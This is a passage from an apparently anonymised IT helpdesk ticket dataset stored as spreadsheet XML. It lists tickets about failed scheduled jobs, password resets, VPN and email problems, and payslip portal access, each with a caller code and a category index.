plm.omf.omforiginalsexport.checkoutbapi(omforiginalsexport.java:337, @(#) $id: omforiginalsexport.java 54279 2014-51.08.85.1636:24z rb $)_x000d__x000a_    plm.omf.omforiginalsexport.downloaddocumentoriginals(omforiginalsexport.java:226, @(#) $id: omforiginalsexport.java 54279 2014-51.08.85.1636:24z rb $)_x000d__x000a_    plm.omf.omforiginalsexport.actionperformed(omforiginalsexport.java:147, @(#) $id: omforiginalsexport.java 54279 2014-51.08.85.1636:24z rb $)_x000d__x000a_    cadagent.gui.obr.obrfunctioneventqueue.run(obrfunctioneventqueue.java:209, @(#) $id: obrfunctioneventqueue.java 51962 2014-07-16 11:28:24z bda $)_x000d__x000a__x000d__x000a_      [api] bapi_document_checkoutview2_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_is this a known problem? when it will be fixed?_x000d__x000a__x000d__x000a_"/>
    <s v="vlymsnej whlqxcst"/>
    <x v="10"/>
  </r>
  <r>
    <s v="job apo_bop_plant_283a failed in job_scheduler at: 10/30/2016 01:25:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job apo_bop_plant_283a failed in job_scheduler at: 10/30/2016 01:25:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="job Job_1315 failed in job_scheduler at: 10/30/2016 00:48:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1315 failed in job_scheduler at: 10/30/2016 00:48:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job mm_zscr0099_wkly_rollfgyuej1 failed in job_scheduler at: 10/30/2016 00:11:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job mm_zscr0099_wkly_rollfgyuej1 failed in job_scheduler at: 10/30/2016 00:11:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="unable to open ie "/>
    <s v="unable to open ie "/>
    <s v="tmopbken ibzougsd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_3050 failed in job_scheduler at: 10/29/2016 23:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3050 failed in job_scheduler at: 10/29/2016 23:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job SID_30cold failed in job_scheduler at: 10/29/2016 18:58:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_30cold failed in job_scheduler at: 10/29/2016 18:58:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job SID_35cold failed in job_scheduler at: 10/29/2016 18:47:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_35cold failed in job_scheduler at: 10/29/2016 18:47:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job Job_436 failed in job_scheduler at: 10/29/2016 18:29:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_436 failed in job_scheduler at: 10/29/2016 18:29:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job SID_29cold failed in job_scheduler at: 10/29/2016 18:11:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_29cold failed in job_scheduler at: 10/29/2016 18:11:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job Job_717 failed in job_scheduler at: 10/29/2016 18:11:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_717 failed in job_scheduler at: 10/29/2016 18:11:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job SID_26cold failed in job_scheduler at: 10/29/2016 18:11:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_26cold failed in job_scheduler at: 10/29/2016 18:11:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job SID_35cold failed in job_scheduler at: 10/29/2016 18:09:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_35cold failed in job_scheduler at: 10/29/2016 18:09:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="amssm00345: c:\ label:sys-amssm00345 94ef9088 on server: is over  85% space consumed. space available: 2.7 g "/>
    <s v="amssm00345: c:\ label:sys-amssm00345 94ef9088 on server: is over  85% space consumed. space available: 2.7 g "/>
    <s v="jyoqwxhz clhxsoqy"/>
    <x v="11"/>
  </r>
  <r>
    <s v="unable to view payslips from hr_tool e time"/>
    <s v="unable to view payslips from hr_tool e time"/>
    <s v="vzrbocfl wxtpoyez"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password expiry tomorrow"/>
    <s v="_x000a__x000a_received from: ecprjbod.litmjwsy@gmail.com_x000a__x000a_my system says my password expires tomorrow.  but when i want to change to a new password, it does not allow.  the new password is not acceptingâ€¦.it says server does not authorize.  kindly check and do the needful as the password is expiring tomorrow.  "/>
    <s v="ecprjbod litmjwsy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="re: ess portal access issue"/>
    <s v="_x000a__x000a_received from: noscwdpm.akiowsmp@gmail.com_x000a__x000a_hello,_x000a__x000a_he is an kiosk user.  please reset the password and confirm._x000a__x000a__x000a_noscwdpm akiowsmp_x000a_noscwdpm.akiowsmp@gmail.com_x000a__x000a_from: ihkolepb ozhnjyef_x000a_sent: 29 october 2016 13:38_x000a_to: company@ticketing_tool.com_x000a_subject: ess portal access issue_x000a__x000a_hi,_x000a__x000a_below mentioned employee krlszbqo spimolgz with user id sv123 is not able to login to ess portal to access his pay slips and related contents. he is a attendance_tool user. please reset his user id and password and revert back._x000a__x000a_"/>
    <s v="noscwdpm akiowsmp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ess portal access issue"/>
    <s v="_x000a__x000a_received from: ihkolepb.ozhnjyef@gmail.com_x000a__x000a_hi,_x000a__x000a_below mentioned employee krlszbqo spimolgz with user id sv123 is not able to login to ess portal to access his pay slips and related contents. he is a attendance_tool user. please reset his user id and password and revert back._x000a__x000a_"/>
    <s v="ihkolepb ozhnjyef"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1390 failed in job_scheduler at: 10/29/2016 03:55:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1390 failed in job_scheduler at: 10/29/2016 03:55:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job Job_2002 failed in job_scheduler at: 10/29/2016 02:52:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2002 failed in job_scheduler at: 10/29/2016 02:52:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_2002 failed in job_scheduler at: 10/29/2016 02:30:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2002 failed in job_scheduler at: 10/29/2016 02:30:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="job Job_1319 failed in job_scheduler at: 10/29/2016 02:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1319 failed in job_scheduler at: 10/29/2016 02:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job Job_1382 failed in job_scheduler at: 10/29/2016 02:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1382 failed in job_scheduler at: 10/29/2016 02:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="attendance_tool - system log on error"/>
    <s v="_x000a__x000a_received from: isfadulo.etkyjabn@gmail.com_x000a__x000a_hello_x000a__x000a_good morning,_x000a__x000a_i am experiencing issues with attendance_tool log on_x000a_every time i try to log on through &quot;single sign portal, the following screen gets displayed and it stays there._x000a_appreciate your support to fix this issue_x000a__x000a__x000a_[cid:image011.jpg@01d231cb.2cceacf0]_x000a__x000a_"/>
    <s v="isfadulo etkyjabn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="excel freezing issue"/>
    <s v="excel freezing issue"/>
    <s v="jborwynt gidxbfrq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to sync a file in collaboration_platform "/>
    <s v="unable to sync a file in collaboration_platform "/>
    <s v="utdlmzyb dvfpraeg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to update password on the password_management_tool password manager"/>
    <s v="unable to update password on the password_management_tool password manager"/>
    <s v="eflahbxn ltdgrvkz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vitalyst transfer: reporting_tool access query"/>
    <s v="vitalyst transfer: reporting_tool access query"/>
    <s v="flhkxeqd gwidroap"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_2881 failed in job_scheduler at: 10/28/2016 18:06:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2881 failed in job_scheduler at: 10/28/2016 18:06:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="12"/>
  </r>
  <r>
    <s v="user said he will callback "/>
    <s v="user said he will callback "/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable update passwords on password_management_tool "/>
    <s v="unable update passwords on password_management_tool "/>
    <s v="xeakyiqt knhjogel"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 erp production password reset // account is locked"/>
    <s v="erp SID_34 erp production password reset // account is locked"/>
    <s v="qmgspxkf mckfysdh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="server issues"/>
    <s v="_x000d__x000a__x000d__x000a_received from: bgqpotek.cuxakvml@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_i have been trying to gain access to my pay roll information on the hub, specifically the hr_tool etime portal. the &quot;other&quot; information on the portal come up without problems, but the &quot;pay stub&quot; does notâ€¦it continuously shows the search ring._x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="bgqpotek cuxakvml"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on ticket_no0454269"/>
    <s v="ticket update on ticket_no0454269"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to display expense report"/>
    <s v="unable to display expense report"/>
    <s v="ncksqfmz fzcjunai"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset for upitdmhz owupktcg cruzjc"/>
    <s v="password reset for upitdmhz owupktcg cruzjc"/>
    <s v="uazkjifp dhtnevcq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login in benefits tab"/>
    <s v="unable to login in benefits tab"/>
    <s v="bsmjflrp bvslpafi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="hello, i'm having an issue with my outlook view.  can you call me and let me share my screen?"/>
    <s v="hello, i'm having an issue with my outlook view.  can you call me and let me share my screen?"/>
    <s v="ndaoxbvi szxlciue"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to access mails "/>
    <s v="unable to access mails "/>
    <s v="cdfqvlzu jzmwuirn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to display expense report"/>
    <s v="unable to display expense report"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mobile device activation"/>
    <s v="from: tvcdfqgp nrbcqwgj _x000a_sent: friday, october 28, 2016 3:13 pm_x000a_to: nwfodmhc exurcwkm_x000a_subject:  se ha bloqueado en forma temporal la sincronizaciÃ³n de su dispositivo mÃ³vil mediante exchange activesync hasta que su administrador autorice el acceso._x000a__x000a_hi_x000a__x000a_i received this message and our local it expert has told me to open a ticket._x000a__x000a_"/>
    <s v="tvcdfqgp nrbcqwgj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="internal keybankrd will not work after cs nor will an external usb keybankrd."/>
    <s v="internal keybankrd will not work after cs nor will an external usb keybankrd."/>
    <s v="hefiuwvo lcgadsef"/>
    <x v="2"/>
  </r>
  <r>
    <s v="blank call //gso"/>
    <s v="blank call //gso"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="update on inplant_874269"/>
    <s v="update on inplant_874269"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password change thru password_management_tool password manager"/>
    <s v="_x000d__x000a__x000d__x000a_received from: jvpkulxw.ovuweygj@gmail.com_x000d__x000a__x000d__x000a_hello sir,_x000d__x000a__x000d__x000a_i tried to change my password thru above. i  got below error. pl help know what action to be taken further to ensure all passwords are same everywhere since belo wmsg says all passwords were not changed._x000d__x000a__x000d__x000a_[cid:image001.jpg@01d2316b.5ff15980]_x000d__x000a__x000d__x000a_"/>
    <s v="jvpkulxw ovuweygj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unlock personal number in ess"/>
    <s v="unlock personal number in ess"/>
    <s v="ltsqkane ycgwexdf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="intermittent service on configair server in SID_34 requires probably a restart on production server"/>
    <s v="intermittent service on configair server in SID_34 requires probably a restart on production server. _x000a_the error occurs in production and shows &quot;500 internal serrver error. error: while trying to invoke the method java.util.list.iterator() of null object loaded from local variable 'local list'&quot;_x000a_the issue can be reproduced in production e.g.:_x000a_a) company customer e.g.# 81510728 and base material mm3716934 (hss/pm finishing)_x000a_b) company customer e.g. .# 81510728 and starting from scratch. i can select a product platform e.g. hp hss/pm roughing, but the screen freezes._x000a_c) log-on language different &quot;en&quot;, e.g. &quot;de&quot;. company customer e.g. 81124199; base material e.g. 5157483. _x000a_we had this issues already several times before and it needed always a restart of the server. thryeu is a good contact person for this issue as he was already working on the root cause with our external vendor configair._x000a_"/>
    <s v="iavozegx jpcudyfi"/>
    <x v="13"/>
  </r>
  <r>
    <s v="unable to access vpn"/>
    <s v="unable to access vpn"/>
    <s v="vtnkwxhr tqxrglvh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to open outlook"/>
    <s v="unable to open outlook"/>
    <s v="kcagqjyv ojhulmes"/>
    <x v="0"/>
  </r>
  <r>
    <s v="install driver in printer hr14 in HostName_769"/>
    <s v="install driver in printer hr14 in HostName_769"/>
    <s v="bihypqsn kbaegpcd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to send emails from outbox"/>
    <s v="unable to send emails from outbox"/>
    <s v="dijxefrq nbgykjpr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="access to business_client drawings"/>
    <s v="name:xvgftyr tryfuh_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:cnkoflhi.abeoucfj@gmail.com_x000a_customer number:_x000a_summary:i cannot seem to access the drawings from the netweaver application that is installed on my computer.  it doesn't take me to the same page that my colleagues have."/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="taking off email permissions from personal phone"/>
    <s v="name:vdhfy_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:dcvphjru.ybomrjst@gmail.com_x000a_customer number:_x000a_summary:i have scrapped the old phone. my mail was configured in it. can you take off the permissions set to view mails on that phone"/>
    <s v="dcvphjru ybomrjst"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1854 failed in job_scheduler at: 10/28/2016 11:06:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1854 failed in job_scheduler at: 10/28/2016 11:06:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_1879 failed in job_scheduler at: 10/28/2016 11:01:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1879 failed in job_scheduler at: 10/28/2016 11:01:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="unable to view payslips in ie"/>
    <s v="unable to view payslips in ie"/>
    <s v="bdgaxriq iltbozkw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="prtgghj4k45 password reset"/>
    <s v="please reset hr_tool gv4536 password reset. "/>
    <s v="qcehailo wqynckxg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="channel partner receiving multiple emails from erp--- urgent"/>
    <s v="hi,_x000a_our channel partner with the email address djhadkudhd@gmail.com, received 50 emails regarding the pos error in a matheywter of 30 milliseconds.  he is very angry, this needs to be fixed aerp.  attached is a file extracted from erp documenting the 50 emails.  "/>
    <s v="qcfmxgid jvxanwre"/>
    <x v="14"/>
  </r>
  <r>
    <s v="usa - (company) : interface fastethernet0/16 &amp; gigabitethernet1/0/18 is down since  09:23 pm et on 09/28."/>
    <s v="usa - (company) : interface fastethernet0/16 &amp; gigabitethernet1/0/18 is down since  09:23 pm et on 09/28."/>
    <s v="jyoqwxhz clhxsoqy"/>
    <x v="7"/>
  </r>
  <r>
    <s v="password reset"/>
    <s v="_x000a__x000a_received from: qtrmxlgv.dfruzvam@gmail.com_x000a__x000a_good morning,_x000a__x000a_i have forgotten my password for erp SID_1.  i have made 3 attempts and failed.  could you please reset.  my user id is dgrtrkjs123._x000a__x000a_"/>
    <s v="qtrmxlgv dfruzvam"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ess login issue"/>
    <s v="ess login issue_x000d__x000a_-verified user details.(employee# &amp; manager name)_x000d__x000a_-checked the user name in ad and reset the password._x000d__x000a_-advised the user to login and check._x000d__x000a_-caller confirmed that he was able to login._x000d__x000a_-issue resolved."/>
    <s v="ukzfqjet zcbhpweo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to start dell 7350 2 in 1 device"/>
    <s v="qifzkoej etbmgjvo is unable to start his dell 7350 2 in 1 tablet device. "/>
    <s v="qifzkoej etbmgjvo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp_print_tool install."/>
    <s v="erp_print_tool install."/>
    <s v="aorthyme rnsuipbk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="good morning. i am having trouble getting into my vpn"/>
    <s v="name:wvngzrca sfmrzdth_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:wvngzrca.sfmrzdth@gmail.com_x000a_customer number:_x000a_summary:good morning. i am having trouble getting into my vpn_x000a_can you assist"/>
    <s v="wvngzrca sfmrzdth"/>
    <x v="0"/>
  </r>
  <r>
    <s v="install acrobat standard"/>
    <s v="install acrobat standard"/>
    <s v="iefgkray zdyksvpw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset from ad"/>
    <s v="password reset from ad"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset the password for wseacnvi azvixyqg on erp / qa / erp"/>
    <s v="please reset my password to SID_1. it's blocked. login  - jdhdw345 . "/>
    <s v="wseacnvi azvixyqg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i used to have acces to this location on collaboration_platform.  now i do not. i need access."/>
    <s v="_x000a__x000a_received from: bwfhtumx.japznrvb@gmail.com_x000a__x000a__x000a__x000a_[cid:image001.jpg@01d230f7.8bb4e830]_x000a__x000a_bwfhtumx japznrvb _x000a_regional controller_x000a_bwfhtumx.japznrvb@gmail.com&lt;mailto:bwfhtumx.japznrvb@gmail.com&gt;_x000a__x000a__x000a__x000a_"/>
    <s v="bwfhtumx japznrvb"/>
    <x v="15"/>
  </r>
  <r>
    <s v="crm add-in is getting disabled from outlook "/>
    <s v="crm add-in is getting disabled from outlook "/>
    <s v="lrbjqcmh jbiwtzqr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook hangs."/>
    <s v="outlook hangs."/>
    <s v="rjsulvat uanigkqc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vpn not working."/>
    <s v="vpn not working."/>
    <s v="vtnkwxhr tqxrglvh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset passwords for hckvpary emxbpkwy using password_management_tool password reset."/>
    <s v="employee is getting an error &quot;user authentication failed&quot; when trying to log into the ess portal.  she is able to access erp and is able to access the hub.  tried to reset and change her password through password_management_tool password manager but got an error  &quot;cannot find account [woodscf] on target [active directory].&quot;_x000a__x000a_her user id is hdjdkt123"/>
    <s v="hckvpary emxbpkwy"/>
    <x v="16"/>
  </r>
  <r>
    <s v="job bkbackup_tool_sql_prod_inc failed in job_scheduler at: 10/28/2016 07:41:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkbackup_tool_sql_prod_inc failed in job_scheduler at: 10/28/2016 07:41:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="ess password reset"/>
    <s v="ess password reset"/>
    <s v="mtgujlcb kczyvpqr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="wy123 printer"/>
    <s v="_x000a__x000a_received from: nxhwyepl.mudstbxo@gmail.com_x000a__x000a_please note some continuous erp printing is happening in printer wy123. the print is not given locally please arrange to cancel the same immediately as lot of paper is getting wasted._x000a__x000a_"/>
    <s v="nxhwyepl mudstbxo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="update java viewer ?"/>
    <s v="_x000d__x000a__x000d__x000a_received from: uijxpazn.gvtzlphs@gmail.com_x000d__x000a__x000d__x000a_dear all,_x000d__x000a__x000d__x000a_java viewer is not working any more. i need access to view scanned inwarehouse_tools in erp._x000d__x000a__x000d__x000a_i assume java update is required ?_x000d__x000a__x000d__x000a_[cid:image001.png@01d2311b.deaf3cb0]_x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="uijxpazn gvtzlphs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_137 failed in job_scheduler at: 10/28/2016 06:38:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_137 failed in job_scheduler at: 10/28/2016 06:38:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="HostName_1297 is currently experiencing high cpu utilization. please investigate!"/>
    <s v="we are observing below alert in monitoring_tool:_x000d__x000a__x000d__x000a_HostName_1297 is currently experiencing high cpu utilization. please investigate!"/>
    <s v="jloygrwh acvztedi"/>
    <x v="13"/>
  </r>
  <r>
    <s v="access to bex"/>
    <s v="_x000d__x000a__x000d__x000a_received from: yfqoaepn.xnezhsit@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_till last week i was accessing bex reports using mms portal and there were no issues._x000d__x000a__x000d__x000a_starting this week the system is incredibly slow when i log in and finally does not allow me to access any reports._x000d__x000a__x000d__x000a_can it be the issue with any maintenance or my access rights or rather i should try to access bex using different way?_x000d__x000a__x000d__x000a_below the print screen from what i see after log in:_x000d__x000a_[cid:image001.png@01d2310c.f184b360]_x000d__x000a__x000d__x000a_i am also able to get to finance reports (see below), however when i click &quot;profitability analysis&quot; (as i was always doing) separate window is open however apart rom that the screen is blank._x000d__x000a_[cid:image002.png@01d2310c.f184b360]_x000d__x000a__x000d__x000a__x000d__x000a_i appreciate your support._x000d__x000a__x000d__x000a_have a great day â˜º_x000d__x000a__x000d__x000a_robhyertyj_x000d__x000a__x000d__x000a__x000d__x000a_yfqoaepn xnezhsit_x000d__x000a_managing director_x000d__x000a_finance manager cee_x000d__x000a_yfqoaepn.xnezhsit@gmail.com&lt;mailto:yfqoaepn.xnezhsit@gmail.com&gt;_x000d__x000a_tel:+48(61)7767671_x000d__x000a_mob:+48 694 425 760_x000d__x000a__x000d__x000a_company polska sp. z o.o. , ul. krzywoustego 7, 61-144 poznaÅ„, www.company.com&lt;_x000d__x000a__x000d__x000a_company polska sp. z o.o. z siedzibÄ… w polandiu, 61-144 poznaÅ„, ul. krzywoustego 7._x000d__x000a_spÃ³Å‚ka zarejestrowana w sÄ…dzie rejonowym poznaÅ„-nowe miasto i wilda w polandiu, wydziaÅ‚ viii gospodarczy krs pod numerem 1111286691._x000d__x000a_kapitaÅ‚ zakÅ‚adowy 100 000 pln, nip 954-20-87-982._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="yfqoaepn xnezhsit"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows account lockout"/>
    <s v="windows account lockout"/>
    <s v="kcipjago mlkptgvb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="æ’¤å›ž: ticket_no1564867 -- comments added"/>
    <s v="_x000a__x000a_received from: abcdri@company.com_x000a__x000a_windy shi å°†æ’¤å›žé‚®ä»¶&quot;ticket_no1564867 -- comments added&quot;ã€‚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
    <s v="tycludks cjofwigv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked in erp SID_34"/>
    <s v="account locked in erp SID_34"/>
    <s v="uvwphrbl hfqdumtv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_593 failed in job_scheduler at: 10/28/2016 04:11:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_593 failed in job_scheduler at: 10/28/2016 04:11:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="user needs training to use engineering tool to view drawings."/>
    <s v="user needs training to use engineering tool to view drawings._x000d__x000a_-connected to the user system using teamviewer._x000d__x000a_-help and educated the user on how login to business_client and view drawings._x000d__x000a_-issue resolved."/>
    <s v="rkzqjbwc juizkwpl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype not working"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rhwvpmlq.zuwhpqrc@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_i am unable to access the skype . the password is showing error ._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.png@01d2311d.d4c2e240]_x000d__x000a__x000d__x000a_"/>
    <s v="rhwvpmlq zuwhpqrc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account unlock request."/>
    <s v="account unlock request."/>
    <s v="lvxakohq tsfnhowj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="[urgent!!] delivery note creation request!! "/>
    <s v="_x000a__x000a_received from: fbvpcytz.nokypgvx@gmail.com_x000a__x000a_hello it team,_x000a__x000a_could you please generate delivery note for below order?_x000a_we cannot issue dn for so#36199966 despite of enough stock for all of items at shipping plantâ€¦_x000a__x000a_sales org : 500000_x000a_delivery plant : plant_317_x000a_shipping point : tys12456_x000a__x000a_so#36199966_x000a_mm#6784736         1pc_x000a_mm#7415645         10pcs_x000a_mm#7415646         10pcs_x000a__x000a_[cid:image002.jpg@01d23138.6a0c5b50]_x000a__x000a__x000a_"/>
    <s v="fbvpcytz nokypgvx"/>
    <x v="17"/>
  </r>
  <r>
    <s v="job Job_495 failed in job_scheduler at: 10/28/2016 03:12:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_495 failed in job_scheduler at: 10/28/2016 03:12:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_481 failed in job_scheduler at: 10/28/2016 02:51:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_481 failed in job_scheduler at: 10/28/2016 02:51:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="error login on to the SID_34 system."/>
    <s v="error login on to the SID_34 system."/>
    <s v="woaiypxu dxslkbif"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to take print out from wy4678"/>
    <s v="unable to take print out from wy4678"/>
    <s v="ewiakvmz tufwrhaj"/>
    <x v="18"/>
  </r>
  <r>
    <s v="job Job_487 failed in job_scheduler at: 10/28/2016 02:06:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_487 failed in job_scheduler at: 10/28/2016 02:06:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="11"/>
  </r>
  <r>
    <s v="unlock supply_chain_software account "/>
    <s v="_x000d__x000a__x000d__x000a_received from: fgehvwxb.ckxegsqv@gmail.com_x000d__x000a__x000d__x000a_hi there,_x000d__x000a__x000d__x000a_would you please help me unlock my supply_chain_software account and reset my supply_chain_software password? "/>
    <s v="fgehvwxb ckxegsqv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to access password_management_tool id password manager ijeqpkrz nwtehsyx grauw"/>
    <s v="i try to change now my password acc. to attached e-mail but this donÂ´t work. i was out of office for vacation time until now, but_x000d__x000a_password_management_tool link donÂ´t work - please help_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_your password expires in 13 day(s) _x000d__x000a__x000d__x000a_the requirement to change your password every 90 days enhances data security within company. _x000d__x000a__x000d__x000a_please login to _x000d__x000a_a step-by-step guide on using the self-service tool is available here: _x000d__x000a__x000d__x000a_please do not reply to this email. if you require assistance, please submit a ticket to the global support center via any of these modes: _x000d__x000a__x000d__x000a_ticketing_tool: _x000d__x000a_email: help@company.com _x000d__x000a__x000d__x000a_kind "/>
    <s v="ijeqpkrz nwtehsyx"/>
    <x v="19"/>
  </r>
  <r>
    <s v="job HostName_957fail failed in job_scheduler at: 10/28/2016 02:03:00  "/>
